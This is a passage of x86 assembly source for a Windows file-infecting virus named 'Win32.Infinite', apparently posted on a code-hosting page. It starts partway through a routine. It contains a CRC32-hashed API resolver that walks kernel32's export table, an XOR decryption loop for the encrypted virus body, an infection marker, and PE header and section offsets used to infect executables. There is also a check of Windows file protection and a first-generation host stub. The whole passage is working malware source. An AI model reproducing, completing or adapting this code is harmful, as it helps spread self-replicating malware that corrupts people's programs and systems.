push dword ptr fs:[edx] ; Set new SEH frame
mov dword ptr fs:[edx],esp
xchg eax,edx ; Put CRC32 of da api in EDX
mov dword ptr [ebp+Counter-delta],eax ; Clear this field :)
push 3Ch
pop esi
add esi,[ebp+TmpModuleBase-delta] ; Get PE header of module
lodsw
add eax,[ebp+TmpModuleBase-delta] ; Normalize
push 1Ch
pop esi
add esi,[eax+78h] ; Get a pointer to its edata
add esi,[ebp+TmpModuleBase-delta]
lea edi,[ebp+AddressTableVA-delta] ; Pointer to the address table
lodsd ; Get AddressTable value
add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; And store in its variable
lodsd ; Get NameTable value
add eax,[ebp+TmpModuleBase-delta] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable
lodsd ; Get OrdinalTable value
add eax,[ebp+TmpModuleBase-delta] ; Normalize
stosd ; Store
pop esi ; ESI = NameTable VA
@?_3: lodsd ; Get pointer to an API name
push esi ; Save again
add eax,[ebp+TmpModuleBase-delta] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX
push edi ; Save EDI
xor al,al
scasb
jnz $-1
pop esi ; ESI = Pointer to API Name
sub edi,ebx ; EDI = API Name size
push edx ; Save API's CRC32
call CRC32 ; Get actual api's CRC32
pop edx ; Restore API's CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it
pop esi ; Restore ptr to api name
inc dword ptr [ebp+Counter-delta] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
mov eax,12345678h ; Put in EAX the number that
Counter = $-4 ; the API occupy in list.
shl eax,1 ; *2 (it's an array of words)
add eax,[ebp+OrdinalTableVA-delta] ; Normalize
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
cwde ; Clear MSW of EAX
shl eax,2 ; And with it we go to the
add eax,[ebp+AddressTableVA-delta] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+TmpModuleBase-delta] ; and normalize!! That's it!
Remove_APICRC32_SEH:
xor edx,edx ; Remove that SEH frame
pop dword ptr fs:[edx]
pop edx
mov [esp.1Ch],eax
popad
ret
GetAPI_ET_CRC32 endp
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Subroutines <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
CRC32:
; input:
; ESI - Pointer to the data to process
; EDI - Size of such data
; output:
; EAX - CRC32 of that data
cld
pushad
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
xchg eax,edx
rol eax,10h
mov ax,cx
mov [esp.PUSHAD_EAX],eax
popad
ret
CheckImageBase:
; input:
; ESI - Address inside module
; ECX - Limit
; output:
; ESI - module address
and esi,0FFFF0000h
cmp word ptr [esi],"ZM"
jz ItWasKewlEnough
NotCoolAddress:
sub esi,00010000h
loop CheckImageBase
ItWasKewlEnough:
ret
random:
; input:
; Nothing.
; output:
; EAX - Random number
apicall GetTickCount
xor eax,12345678h
org $-4
seed dd -1
mov dword ptr [ebp+seed-delta],eax
ret
; Let's save some bytes ;)
get_delta:
call delta ; Get a relative address from
delta: pop ebp ; when calculate offsets
ret
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Virus Data <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
api_list = $
; db "KERNEL32",0 ; Don't needed
@VirtualProtect dd 079C3D4BBh
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetFileSize dd 0EF7D811Bh
@SetFilePointer dd 085859D42h
@GetSystemTime dd 075B7EBE8h
@LoadLibraryA dd 04134D1ADh
@FreeLibrary dd 0AFDF191Fh
@GlobalAlloc dd 083A353C3h
@GlobalFree dd 05CDF6B6Ah
@WriteFile dd 021777793h
@GetProcAddress dd 0FFC97C1Fh
@GetTickCount dd 0613FD7BAh
db 0BBh
db "IMAGEHLP",0
@CheckSumMappedFile dd 078B31744h
db 0BBh
db "SFC",0
@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh
; That's the end, my friend...
db ""
encrypt_end = $
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Simple decryption l00p :) <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
decrypt:
pop esi
mov edi,esi
mov ecx,encrypt_end-encrypt_start
mov bl,00h
enc_key = $-1
dec_l00p:
lodsb
xor al,bl
stosb
loop dec_l00p
jmp encrypt_start
virus_end = $
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Virus Data in the heap <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
kernel dd ?
TmpModuleBase dd ?
AddressTableVA dd ?
NameTableVA dd ?
OrdinalTableVA dd ?
OriginalSize dd ?
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
PtrPEH dd ?
EPofs dd ?
api_addresses = $
; KERNEL32 APIs
VirtualProtect dd ?
FindFirstFileA dd ?
FindNextFileA dd ?
FindClose dd ?
CreateFileA dd ?
SetFileAttributesA dd ?
CloseHandle dd ?
GetCurrentDirectoryA dd ?
SetCurrentDirectoryA dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetEndOfFile dd ?
GetFileSize dd ?
SetFilePointer dd ?
GetSystemTime dd ?
LoadLibraryA dd ?
FreeLibrary dd ?
GlobalAlloc dd ?
GlobalFree dd ?
WriteFile dd ?
GetProcAddress dd ?
GetTickCount dd ?
; IMAGEHLP APIs
CheckSumMappedFile dd ?
; SFC APIs
SfcIsFileProtected dd ?
; Other datas
WFD WIN32_FIND_DATA <?>
infect_dir db 7Fh dup (?)
current_dir db 7Fh dup (?)
heap_end = $
virseg ends
end infinite
;------------------------------[ INFINITE.INC ]------------------------------;
;****************************************************************************
;** This is the include file for the constant and macros of the virus **
;****************************************************************************
; Constants
virus_size = virus_end-virus_start
total_size = heap_end-virus_start
inf_mark = "AIAG"
security = 20d ; Very important
PUSHAD_EDI = 00h
PUSHAD_ESI = 04h
PUSHAD_EBP = 08h
PUSHAD_ESP = 0Ch
PUSHAD_EBX = 10h
PUSHAD_EDX = 14h
PUSHAD_ECX = 18h
PUSHAD_EAX = 1Ch
; Some PE header stuff
MagicPE = 00h
Machine = 04h
NumberOfSections= 06h
EntrypointRVA = 28h
CodeRVA = 2Ch
FileAlignment = 3Ch
MagicInfection = 4Ch
SizeOfImage = 50h
CheckSum = 58h
PECharacteristics= 5Eh
DirEntryReloc = 0A0h
; Some section header fields
SectionName = 00h
VirtualSize = 08h
VirtualAddress = 0Ch
SizeOfRawData = 10h
PtrToRawData = 14h
PtrToReloc = 18h
NumOfReloc = 20h
Characteristics = 24h
; Macros
apicall macro api2call
call dword ptr [ebp+api2call-delta]
endm
; Structures
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
szFileName db 260 dup (?)
szAlternateFileName db 13 dup (?)
db 03 dup (?)
WIN32_FIND_DATA ends
;-------------------------------[ HOST.INC ]--------------------------------;
;****************************************************************************
;** This is the host for the first generation **
;****************************************************************************
.586p
.model flat,stdcall
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
_DATA segment dword use32 public 'DATA'
szTtl db "Win32.Infinite",0
szMsg db "Size "
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " - "
db "Virtual "
db total_size/1000 mod 10 + "0"
db total_size/0100 mod 10 + "0"
db total_size/0010 mod 10 + "0"
db total_size/0001 mod 10 + "0"
db 10,"(c) 2000 Billy Belcebu/iKX",0
_DATA ends
_TEXT segment dword use32 public'CODE'
virus_init proc
jmp virus_start
host:
db epo_bytes dup (90h)
call MessageBoxA,0,offset szMsg,offset szTtl,0
call ExitProcess,0
virus_init endp
_TEXT ends
Reference in New Issue Copy Permalink